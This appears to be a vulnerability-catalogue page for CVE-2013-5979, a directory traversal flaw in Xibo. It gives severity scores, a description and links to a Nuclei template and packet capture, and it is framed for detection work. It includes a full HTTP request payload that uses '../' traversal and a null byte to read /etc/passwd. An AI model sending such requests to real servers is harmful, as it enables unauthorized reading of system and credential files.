🔙 목록으로 돌아가기

CVE-2013-5979: Xibo 1.2.2/1.4.1 - Directory Traversal

TitleXibo 1.2.2/1.4.1 - Directory Traversal
Authordaffainfo
SeverityMedium
ImpactAn attacker can read arbitrary files on the server.
RemediationUpgrade to a patched version of Xibo.
CVSS Score5
EPSS Score0.48856
CVE IDCVE-2013-5979
CWE IDCWE-22
Tags cve2013 cve lfi edb springsignage vuln

🔍 Vulnerability Description

A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.

🌐 HTTP Request

GET /index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2013/CVE-2013-5979.yaml

🦈 Packet Capture: ⬇️ Download cve-2013-5979.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A